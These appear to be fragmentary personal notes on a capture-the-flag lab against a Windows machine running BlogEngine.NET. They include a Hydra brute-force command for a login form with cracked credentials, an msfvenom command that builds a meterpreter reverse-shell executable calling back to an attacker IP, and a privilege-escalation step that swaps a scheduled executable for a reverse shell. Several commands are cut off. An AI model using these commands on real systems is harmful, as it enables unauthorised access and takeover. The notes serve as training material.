-
Google reverse image search
-
Hydra - parallelized, fast and flexible login cracker post: type of request windows website login would use get request payload: Network > All > post request > Request Payload command format: hydra -l
-P . $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ login: admin password: 1qaz2wsx
hydra cheat sheet:
Command Description
hydra -P
-
Enumerate website -find BlogEngine.NET specification v: 3.3.6.0 -search for exploit -gain initial access
-
gain reverse tcp using msfvenom msfvenom -p windows/meterpreter/reverse_tcp -a x86 —encoder x86/shikata_ga_nai LHOST=10.9.. LPORT=2345 -f exe -o revshell.exe -serve file using python server python3 -m http.server access to meterpreter
-
escalate privileges -use windows-exploit-suggester -find abnormal service WindowsScheduler.exe Message.exe executed every 30 seconds -goal is to create ‘Message.exe’ reverse shell to gain higher privileges
-
find root and user flags